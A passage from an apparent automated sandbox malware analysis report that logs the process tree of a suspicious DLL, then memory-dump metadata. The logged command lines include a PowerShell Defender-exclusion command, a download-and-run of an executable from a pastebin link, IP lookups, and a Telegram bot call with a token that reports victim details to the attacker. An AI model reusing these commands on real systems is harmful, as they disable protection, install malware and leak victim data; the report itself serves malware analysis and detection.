                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
                                                                                                                                                          Imagebase:0x750000
                                                                                                                                                          File size:2'141'552 bytes
                                                                                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:06:47:00
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:06:47:01
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"
                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                          File size:46'832 bytes
                                                                                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:06:47:01
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:06:47:01
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:06:47:03
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled
                                                                                                                                                          Imagebase:0x930000
                                                                                                                                                          File size:61'440 bytes
                                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:06:47:03
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
                                                                                                                                                          Imagebase:0x750000
                                                                                                                                                          File size:2'141'552 bytes
                                                                                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:13
                                                                                                                                                          Start time:06:47:03
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:06:47:04
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"
                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                          File size:46'832 bytes
                                                                                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:06:47:04
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:06:47:04
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:06:47:07
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:06:47:07
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:19
                                                                                                                                                          Start time:06:47:10
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:06:47:10
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:24
                                                                                                                                                          Start time:06:47:21
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Temp\zbjnkzvo4cc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\Temp\zbjnkzvo4cc.exe"
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:716'800 bytes
                                                                                                                                                          MD5 hash:1D08526FC81B1D62195F4E5DEA52BB6F
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:06:47:22
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:06:47:22
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                          Imagebase:0x460000
                                                                                                                                                          File size:43'016 bytes
                                                                                                                                                          MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:29
                                                                                                                                                          Start time:06:47:23
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
                                                                                                                                                          Imagebase:0x980000
                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:30
                                                                                                                                                          Start time:06:47:24
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\Temp\mxtvcgq32fe.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\Temp\mxtvcgq32fe.exe"
                                                                                                                                                          Imagebase:0x540000
                                                                                                                                                          File size:716'800 bytes
                                                                                                                                                          MD5 hash:1D08526FC81B1D62195F4E5DEA52BB6F
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:31
                                                                                                                                                          Start time:06:47:24
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:33
                                                                                                                                                          Start time:06:47:25
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212
                                                                                                                                                          Imagebase:0x980000
                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:34
                                                                                                                                                          Start time:06:47:52
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:35
                                                                                                                                                          Start time:06:47:52
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:36
                                                                                                                                                          Start time:06:47:54
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:37
                                                                                                                                                          Start time:06:47:54
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:38
                                                                                                                                                          Start time:06:48:01
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:39
                                                                                                                                                          Start time:06:48:01
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:40
                                                                                                                                                          Start time:06:48:03
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:41
                                                                                                                                                          Start time:06:48:03
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:42
                                                                                                                                                          Start time:06:48:14
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:43
                                                                                                                                                          Start time:06:48:14
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:44
                                                                                                                                                          Start time:06:48:16
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:45
                                                                                                                                                          Start time:06:48:17
                                                                                                                                                          Start date:23/11/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Reset < >
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: lo7p$d7p
                                                                                                                                                            • API String ID: 0-3642153419
                                                                                                                                                            • Opcode ID: d6735f644f47bde6892effe24b938490e48d7fd8c5ef929ced987d6b26ddfaa1
                                                                                                                                                            • Instruction ID: 332315825b1564f8d8558dbf07ce54bbcb9fa055009e32cec0d8474c9f13e130
                                                                                                                                                            • Opcode Fuzzy Hash: d6735f644f47bde6892effe24b938490e48d7fd8c5ef929ced987d6b26ddfaa1
                                                                                                                                                            • Instruction Fuzzy Hash: B8216074B11104DFCB04DF68E598AAD7BF2FF8C614F218069E402EB3A1CB75AC059B50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: lo7p$d7p
                                                                                                                                                            • API String ID: 0-3642153419
                                                                                                                                                            • Opcode ID: 21e88f94c922d13a2f0dea0fad4b830d0fe496afd34b733c766e166744266361
                                                                                                                                                            • Instruction ID: 75073b62df08502d650dc83024d8f4fe61baec1e104a47dffaa3e1f232f32287
                                                                                                                                                            • Opcode Fuzzy Hash: 21e88f94c922d13a2f0dea0fad4b830d0fe496afd34b733c766e166744266361
                                                                                                                                                            • Instruction Fuzzy Hash: 58213874B11208DFCB54DF69D598A6D7BF6FF8C610F208069E802EB3A1DB75AC009B50
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: baa2e2dab3e76676fcd7dd8861eb0bf229c0d08e4e8d97175e0a446e4eb196e5
                                                                                                                                                            • Instruction ID: 4325083e62919a03176ceeee34a58f6a1fb5c7190cb2d463235f4908bd3ad07d
                                                                                                                                                            • Opcode Fuzzy Hash: baa2e2dab3e76676fcd7dd8861eb0bf229c0d08e4e8d97175e0a446e4eb196e5
                                                                                                                                                            • Instruction Fuzzy Hash: 9DE02B3260C294AFCB015F64F86845D3F75EFD626130C40EBE895CB293C9384D16E792
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f3ddf8e7c8a376924f9338a83888408ec3564c69d98800f87f13bffa31f79ff7
                                                                                                                                                            • Instruction ID: 68f199ea90c361adf649636f3a1fe68b17af44b025ab2c6fdcc7886f1dad62b2
                                                                                                                                                            • Opcode Fuzzy Hash: f3ddf8e7c8a376924f9338a83888408ec3564c69d98800f87f13bffa31f79ff7
                                                                                                                                                            • Instruction Fuzzy Hash: 69515C74B102118FDB44DB38D854A6E7BF6BFC8610B2584A8E906DF3B5DE35EC428B90
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2633952035.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_4700000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 70a482617e590651f58beecd8f870d80ce74d9c2fcccf9097047a8e0345601ad
                                                                                                                                                            • Instruction ID: 2fab453193b7fee05b7a767c59ef412c317a6822cd067c4465d352467c5257f0
                                                                                                                                                            • Opcode Fuzzy Hash: 70a482617e590651f58beecd8f870d80ce74d9c2fcccf9097047a8e0345601ad
